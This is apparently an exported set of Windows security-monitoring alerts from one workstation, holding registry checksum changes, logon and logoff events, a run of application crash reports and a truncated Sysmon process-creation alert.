+"Apr 26, 2020 @ 10:18:06.073",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed.
+Old md5sum was: '4ba4365f07f1541a9d0cb4adc696cbaa'
+New md5sum is : '9b2eb62ca4c74330ffa1448b22e6dfac'
+Old sha1sum was: '6766757ccbe9ec12bc588faf319b992e7bd63e19'
+New sha1sum is : '9ae0bb56b661cb86cac596f8cf95cde5c871458b'
+",
+"Apr 26, 2020 @ 10:18:02.983",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3ddcb' was added.
+",
+"Apr 26, 2020 @ 10:18:02.943",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3ddcb\Security' was added.
+",
+"Apr 26, 2020 @ 10:17:59.972",3,"Windows Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x24c
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 26, 2020 @ 10:17:56.459",4,"Summary event of the report's signatures",,"""Fault bucket 1610563783070951124, type 5
+Event Name: MoAppCrash
+Response: Not available
+Cab Id: 0
+
+Problem signature:
+P1: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe
+P2: praid:runtimebroker07f4358a809ac99a64a67c1
+P3: 10.0.18362.1
+P4: 4539d5a0
+P5: ntdll.dll
+P6: 10.0.18362.719
+P7: 64d10ee0
+P8: c0000005
+P9: 000000000003b890
+P10:
+
+Attached files:
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER166C.tmp.dmp
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER190D.tmp.WERInternalMetadata.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER19D9.tmp.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A80.tmp.csv
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AFE.tmp.txt
+
+These files may be available here:
+\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.YourPh_9b4ff627d34cddc3d612adfa4c8dcd0365bb70_95f60aa5_c4b6ee39-9bf4-4ac8-9ce8-ec187f02e3e1
+
+Analysis symbol:
+Rechecking for solution: 0
+Report Id: 4cc55f11-32da-4e0c-abbc-57309f512e72
+Report Status: 268435456
+Hashed bucket: 9899f004d8650e352659df3a420da6d4
+Cab Guid: 0"""
+"Apr 26, 2020 @ 10:17:52.171",9,"Windows Application error event",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0
+Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0
+Exception code: 0xc0000005
+Fault offset: 0x000000000003b890
+Faulting process id: 0x7b4
+Faulting application start time: 0x01d61bb3afec9653
+Faulting application path: C:\Windows\System32\RuntimeBroker.exe
+Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
+Report Id: 4cc55f11-32da-4e0c-abbc-57309f512e72
+Faulting package full name: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe
+Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1"""
+"Apr 26, 2020 @ 10:17:43.633",4,"Summary event of the report's signatures",,"""Fault bucket 1169745795226003087, type 4
+Event Name: APPCRASH
+Response: Not available
+Cab Id: 0
+
+Problem signature:
+P1: SecurityHealthSystray.exe
+P2: 10.0.18362.628
+P3: 765bdd03
+P4: ntdll.dll
+P5: 10.0.18362.719
+P6: 64d10ee0
+P7: c0000005
+P8: 000000000003b890
+P9:
+P10:
+
+Attached files:
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAED8.tmp.dmp
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF95.tmp.WERInternalMetadata.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB003.tmp.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB01B.tmp.csv
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB07A.tmp.txt
+
+These files may be available here:
+\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_SecurityHealthSy_90252a4db18aef6effabc3a136419b89f51c2f7f_28e80497_92e55f6c-92cf-48cd-bb92-88e15dd67dec
+
+Analysis symbol:
+Rechecking for solution: 0
+Report Id: c925838d-8dbd-4da0-a30f-c15c605a581a
+Report Status: 268435456
+Hashed bucket: 545dc7a61a4342f5d03bc59a69f3e68f
+Cab Guid: 0"""
+"Apr 26, 2020 @ 10:17:37.589",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-27T10:15:09Z. Reason: RulesEngine."""
+"Apr 26, 2020 @ 10:17:36.741",4,"Summary event of the report's signatures",,"""Fault bucket 1837995919748689722, type 5
+Event Name: FaultTolerantHeap
+Response: Not available
+Cab Id: 0
+
+Problem signature:
+P1: SecurityHealthSystray.exe
+P2: 10.0.18362.628
+P3: 765BDD03
+P4: ffffbaad
+P5:
+P6:
+P7:
+P8:
+P9:
+P10:
+
+Attached files:
+\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTHAE67.tmp\fthempty.txt
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE68.tmp.WERInternalMetadata.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE79.tmp.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAEC2.tmp.csv
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF01.tmp.txt
+
+These files may be available here:
+
+
+Analysis symbol:
+Rechecking for solution: 0
+Report Id: 2c2b064a-de3b-47b2-87c2-f2bec386572f
+Report Status: 268435456
+Hashed bucket: c340295b095a416b1981df8d073cef3a
+Cab Guid: 0"""
+"Apr 26, 2020 @ 10:17:36.603",9,"Windows Application error event",,"""Faulting application name: SecurityHealthSystray.exe, version: 10.0.18362.628, time stamp: 0x765bdd03
+Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0
+Exception code: 0xc0000005
+Fault offset: 0x000000000003b890
+Faulting process id: 0xc98
+Faulting application start time: 0x01d61bb3b0e56075
+Faulting application path: C:\Windows\System32\SecurityHealthSystray.exe
+Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
+Report Id: c925838d-8dbd-4da0-a30f-c15c605a581a
+Faulting package full name:
+Faulting package-relative application ID: """
+"Apr 26, 2020 @ 10:17:36.413",4,"Summary event of the report's signatures",,"""Fault bucket 1248787444007029779, type 5
+Event Name: MoAppCrash
+Response: Not available
+Cab Id: 0
+
+Problem signature:
+P1: Microsoft.LockApp_10.0.18362.449_neutral__cw5n1h2txyewy
+P2: praid:runtimebroker07f4358a809ac99a64a67c1
+P3: 10.0.18362.1
+P4: 4539d5a0
+P5: ntdll.dll
+P6: 10.0.18362.719
+P7: 64d10ee0
+P8: c0000005
+P9: 000000000003b890
+P10:
+
+Attached files:
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA35F.tmp.dmp
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA592.tmp.WERInternalMetadata.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5F1.tmp.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA624.tmp.csv
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6B2.tmp.txt
+
+These files may be available here:
+\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.LockAp_590ea8791e63c6d7c6582b29d38d263a1a935d_6ded9965_d1e6aede-8d06-4251-b769-a2b45e3d355e
+
+Analysis symbol:
+Rechecking for solution: 0
+Report Id: ab48e232-7688-48f5-8a36-972e486fe08d
+Report Status: 268435456
+Hashed bucket: b60fec88597a8a20815495906001cc13
+Cab Guid: 0"""
+"Apr 26, 2020 @ 10:17:31.467",9,"Windows Application error event",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0
+Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0
+Exception code: 0xc0000005
+Fault offset: 0x000000000003b890
+Faulting process id: 0x15cc
+Faulting application start time: 0x01d61bb3abd13bfb
+Faulting application path: C:\Windows\System32\RuntimeBroker.exe
+Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
+Report Id: ab48e232-7688-48f5-8a36-972e486fe08d
+Faulting package full name: Microsoft.LockApp_10.0.18362.449_neutral__cw5n1h2txyewy
+Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1"""
+"Apr 26, 2020 @ 10:17:20.856",4,"Summary event of the report's signatures",,"""Fault bucket 1445133708988233608, type 5
+Event Name: MoAppCrash
+Response: Not available
+Cab Id: 0
+
+Problem signature:
+P1: Microsoft.Windows.Cortana_1.13.0.18362_neutral_neutral_cw5n1h2txyewy
+P2: praid:runtimebroker07f4358a809ac99a64a67c1
+P3: 10.0.18362.1
+P4: 4539d5a0
+P5: ntdll.dll
+P6: 10.0.18362.719
+P7: 64d10ee0
+P8: c0000005
+P9: 000000000003b890
+P10:
+
+Attached files:
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D87.tmp.dmp
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8558.tmp.WERInternalMetadata.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER86D0.tmp.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER875F.tmp.csv
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER880C.tmp.txt
+
+These files may be available here:
+\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_11cb9b8877caa9f72067315a9d734bc239156e36_fcf65235_1aa5f512-fb57-4010-aca2-3ea0030f88ad
+
+Analysis symbol:
+Rechecking for solution: 0
+Report Id: 35b39479-8c80-4e92-bdc6-c7341d069b33
+Report Status: 268435456
+Hashed bucket: 74de369fdf5b4d78040e2573a12fb788
+Cab Guid: 0"""
+"Apr 26, 2020 @ 10:17:18.083",3,"Windows User Logoff",,"""An account was logged off.
+
+Subject:
+ Security ID: S-1-5-21-438079597-2123118846-2669748851-1001
+ Account Name: John Williams
+ Account Domain: DESKTOP-HUE026H
+ Logon ID: 0x1112D9
+
+Logon Type: 2
+
+This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."""
+"Apr 26, 2020 @ 10:17:18.056",3,"Windows User Logoff",,"""An account was logged off.
+
+Subject:
+ Security ID: S-1-5-21-438079597-2123118846-2669748851-1001
+ Account Name: John Williams
+ Account Domain: DESKTOP-HUE026H
+ Logon ID: 0x1112F9
+
+Logon Type: 2
+
+This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer."""
+"Apr 26, 2020 @ 10:17:17.920",3,"Windows Workstation Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 2
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: No
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-21-438079597-2123118846-2669748851-1001
+ Account Name: John Williams
+ Account Domain: DESKTOP-HUE026H
+ Logon ID: 0x1112F9
+ Linked Logon ID: 0x1112D9
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x154
+ Process Name: C:\Windows\System32\svchost.exe
+
+Network Information:
+ Workstation Name: DESKTOP-HUE026H
+ Source Network Address: 127.0.0.1
+ Source Port: 0
+
+Detailed Authentication Information:
+ Logon Process: User32
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 26, 2020 @ 10:17:17.885",3,"Windows Workstation Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 2
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-21-438079597-2123118846-2669748851-1001
+ Account Name: John Williams
+ Account Domain: DESKTOP-HUE026H
+ Logon ID: 0x1112D9
+ Linked Logon ID: 0x1112F9
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x154
+ Process Name: C:\Windows\System32\svchost.exe
+
+Network Information:
+ Workstation Name: DESKTOP-HUE026H
+ Source Network Address: 127.0.0.1
+ Source Port: 0
+
+Detailed Authentication Information:
+ Logon Process: User32
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 26, 2020 @ 10:17:17.872",4,"Summary event of the report's signatures",,"""Fault bucket 1249619647368064933, type 5
+Event Name: FaultTolerantHeap
+Response: Not available
+Cab Id: 0
+
+Problem signature:
+P1: RuntimeBroker.exe
+P2: 10.0.18362.1
+P3: 4539D5A0
+P4: ffffbaad
+P5:
+P6:
+P7:
+P8:
+P9:
+P10:
+
+Attached files:
+\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH7A93.tmp\fthempty.txt
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A94.tmp.WERInternalMetadata.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER7AA4.tmp.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER7AFA.tmp.csv
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CB0.tmp.txt
+
+These files may be available here:
+
+
+Analysis symbol:
+Rechecking for solution: 0
+Report Id: c226da71-0f6f-4e54-87eb-2f7a616fd75c
+Report Status: 268435456
+Hashed bucket: 83ecd02fadfbabe731578a72d1b8efa5
+Cab Guid: 0"""
+"Apr 26, 2020 @ 10:17:17.869",4,"Summary event of the report's signatures",,"""Fault bucket 1622308077343013045, type 5
+Event Name: BEX
+Response: Not available
+Cab Id: 0
+
+Problem signature:
+P1: OneDrive.exe
+P2: 19.232.1124.10
+P3: 1482ea94
+P4: ntdll.dll
+P5: 10.0.18362.719
+P6: 832e7bce
+P7: 00088d30
+P8: c0000409
+P9: 0000000a
+P10:
+
+Attached files:
+\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\TraceCurrent.1124.0010.etl
+\\?\C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\logs\Personal\SyncEngine-2020-04-26.1016.6176.1.aodl
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER53D8.tmp.dmp
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER6686.tmp.WERInternalMetadata.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER6762.tmp.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER67AE.tmp.csv
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER687A.tmp.txt
+
+These files may be available here:
+\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_OneDrive.exe_5f9f888f92a070788b9455eacf35150c2a872_07f528d8_a4b2d373-6777-4a11-85be-87e669554117
+
+Analysis symbol:
+Rechecking for solution: 0
+Report Id: 38caffed-687f-4951-8b4b-1f37a83ef62e
+Report Status: 268435456
+Hashed bucket: c88d0b45f49ff7ddf6839899da46f8b5
+Cab Guid: 0"""
+"Apr 26, 2020 @ 10:17:16.521",9,"Windows Application error event",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0
+Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0
+Exception code: 0xc0000005
+Fault offset: 0x000000000003b890
+Faulting process id: 0x1104
+Faulting application start time: 0x01d61bb3a9b2df74
+Faulting application path: C:\Windows\System32\RuntimeBroker.exe
+Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
+Report Id: 35b39479-8c80-4e92-bdc6-c7341d069b33
+Faulting package full name: Microsoft.Windows.Cortana_1.13.0.18362_neutral_neutral_cw5n1h2txyewy
+Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1"""
+"Apr 26, 2020 @ 10:17:16.433",4,"Summary event of the report's signatures",,"""Fault bucket 2151335052192812308, type 5
+Event Name: MoAppCrash
+Response: Not available
+Cab Id: 0
+
+Problem signature:
+P1: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe
+P2: praid:App
+P3: 10.0.18362.1
+P4: 2beeabda
+P5: ntdll.dll
+P6: 10.0.18362.719
+P7: 64d10ee0
+P8: c0000005
+P9: 000000000003b890
+P10:
+
+Attached files:
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER63E5.tmp.dmp
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER656D.tmp.WERInternalMetadata.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER659C.tmp.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER65C8.tmp.csv
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER65E8.tmp.txt
+
+These files may be available here:
+\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.XboxGa_44258378a6d5e98bf439dc31a9d6bf4da030a7e7_f472b3e4_fd92b24d-08ed-45fa-8232-83aeaeb2fcd2
+
+Analysis symbol:
+Rechecking for solution: 0
+Report Id: 7e8853f7-8f35-4707-b507-57722a9079e7
+Report Status: 268435456
+Hashed bucket: cad575abb2ada21baddb13d4eacc8d14
+Cab Guid: 0"""
+"Apr 26, 2020 @ 10:17:16.364",9,"Windows Application error event",,"""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied.
+] """
+"Apr 26, 2020 @ 10:17:14.507",4,"Summary event of the report's signatures",,"""Fault bucket 1657758300517278340, type 4
+Event Name: APPCRASH
+Response: Not available
+Cab Id: 0
+
+Problem signature:
+P1: smartscreen.exe
+P2: 10.0.18362.1
+P3: cd4269a6
+P4: ntdll.dll
+P5: 10.0.18362.719
+P6: 64d10ee0
+P7: c0000005
+P8: 000000000003b890
+P9:
+P10:
+
+Attached files:
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER53F7.tmp.dmp
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER58BB.tmp.WERInternalMetadata.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A23.tmp.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A79.tmp.csv
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5AE7.tmp.txt
+
+These files may be available here:
+\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_smartscreen.exe_a7811b8033dd303c40b87ed1ad6c29cf39727bee_5d80af6c_25f4ee7e-0dba-4c49-8c2a-8cde6ff83308
+
+Analysis symbol:
+Rechecking for solution: 0
+Report Id: bada2dbd-4f2e-43f0-8ef1-f8bfb7212112
+Report Status: 268435456
+Hashed bucket: 0424f099e54e519237018a6421c9a284
+Cab Guid: 0"""
+"Apr 26, 2020 @ 10:17:14.491",4,"Summary event of the report's signatures",,"""Fault bucket 1229570998794408688, type 5
+Event Name: FaultTolerantHeap
+Response: Not available
+Cab Id: 0
+
+Problem signature:
+P1: BackgroundTransferHost.exe
+P2: 10.0.18362.1
+P3: 2BEEABDA
+P4: ffffbaad
+P5:
+P6:
+P7:
+P8:
+P9:
+P10:
+
+Attached files:
+\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH6207.tmp\fthempty.txt
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER6208.tmp.WERInternalMetadata.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER6228.tmp.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER627A.tmp.csv
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER62E8.tmp.txt
+
+These files may be available here:
+
+
+Analysis symbol:
+Rechecking for solution: 0
+Report Id: 1f7bb328-9945-4e8f-b2e1-ccf01acea4a4
+Report Status: 268435456
+Hashed bucket: f00ea1b2ce1400058110504f114352f0
+Cab Guid: 0"""
+"Apr 26, 2020 @ 10:17:12.323",10,"Multiple Windows error Application events",,"""Faulting application name: BackgroundTransferHost.exe, version: 10.0.18362.1, time stamp: 0x2beeabda
+Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0
+Exception code: 0xc0000005
+Fault offset: 0x000000000003b890
+Faulting process id: 0x1b48
+Faulting application start time: 0x01d61bb3b3d7df03
+Faulting application path: C:\Windows\system32\BackgroundTransferHost.exe
+Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
+Report Id: 7e8853f7-8f35-4707-b507-57722a9079e7
+Faulting package full name: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe
+Faulting package-relative application ID: App"""
+"Apr 26, 2020 @ 10:17:10.431",4,"Summary event of the report's signatures",,"""Fault bucket 1296249511987065443, type 5
+Event Name: FaultTolerantHeap
+Response: Not available
+Cab Id: 0
+
+Problem signature:
+P1: smartscreen.exe
+P2: 10.0.18362.1
+P3: CD4269A6
+P4: ffffbaad
+P5:
+P6:
+P7:
+P8:
+P9:
+P10:
+
+Attached files:
+\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH51A8.tmp\fthempty.txt
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER51B9.tmp.WERInternalMetadata.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER51C9.tmp.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5259.tmp.csv
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER5306.tmp.txt
+
+These files may be available here:
+
+
+Analysis symbol:
+Rechecking for solution: 0
+Report Id: 9a5af2b2-6e76-47de-95c3-15f292b3654e
+Report Status: 268435456
+Hashed bucket: d71934d1179b2fac11fd341036433263
+Cab Guid: 0"""
+"Apr 26, 2020 @ 10:17:10.329",9,"Windows Application error event",,"""Faulting application name: smartscreen.exe, version: 10.0.18362.1, time stamp: 0xcd4269a6
+Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0
+Exception code: 0xc0000005
+Fault offset: 0x000000000003b890
+Faulting process id: 0x1028
+Faulting application start time: 0x01d61bb3b0d441e8
+Faulting application path: C:\Windows\System32\smartscreen.exe
+Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
+Report Id: bada2dbd-4f2e-43f0-8ef1-f8bfb7212112
+Faulting package full name:
+Faulting package-relative application ID: """
+"Apr 26, 2020 @ 10:17:10.316",4,"Summary event of the report's signatures",,"""Fault bucket 1774762671288966134, type 5
+Event Name: MoBEX
+Response: Not available
+Cab Id: 0
+
+Problem signature:
+P1: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe
+P2: praid:App
+P3: 3.38.2002.25003
+P4: 5e5615f2
+P5: ucrtbase.dll
+P6: 10.0.18362.387
+P7: 4361b720
+P8: 000000000006db8e
+P9: c0000409
+P10: 0000000000000007
+
+Attached files:
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3246.tmp.dmp
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER39B9.tmp.WERInternalMetadata.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A47.tmp.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AF7.tmp.csv
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BE2.tmp.txt
+
+These files may be available here:
+\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.XboxGa_3b3227e216aa2c869289ee6bde534bb1e47de_f472b3e4_9d7855b8-f7fe-4752-b738-35b3c6db04e2
+
+Analysis symbol:
+Rechecking for solution: 0
+Report Id: 440a54a0-304d-4b82-9310-8d86ef000ed6
+Report Status: 268435456
+Hashed bucket: 8d5ad5ac411b2e89e8a1393f16cd5bf6
+Cab Guid: 0"""
+"Apr 26, 2020 @ 10:17:09.403",9,"Windows Application error event",,"""Faulting application name: OneDrive.exe, version: 19.232.1124.10, time stamp: 0x1482ea94
+Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x832e7bce
+Exception code: 0xc0000409
+Fault offset: 0x00088d30
+Faulting process id: 0x1820
+Faulting application start time: 0x01d61bb3b1308dc8
+Faulting application path: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\OneDrive.exe
+Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
+Report Id: 38caffed-687f-4951-8b4b-1f37a83ef62e
+Faulting package full name:
+Faulting package-relative application ID: """
+"Apr 26, 2020 @ 10:17:07.320",12,"Sysmon - Suspicious Process - explorer.exe","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:16:37.244055700Z"",""eventRecordID"":""1024"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-04-26 10:16:37.011\r\nProcessGuid: {df9fc3d3-5f85-5ea5-0000-0010fecb0e00}\r\nProcessId: 8948\r\nImage: C:\\Windows\\explorer.exe\r\nFileVersion: 10.0.18362.693 (WinBuild.160101.0800)\r\nDescription: Windows Explorer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: EXPLORER.EXE\r\nCommandLine: explorer.exe /LOADSAVEDWINDOWS\r\nCurrentDirectory: C:\\Windows\\\r\nUser: DESKTOP-HUE026H\\John 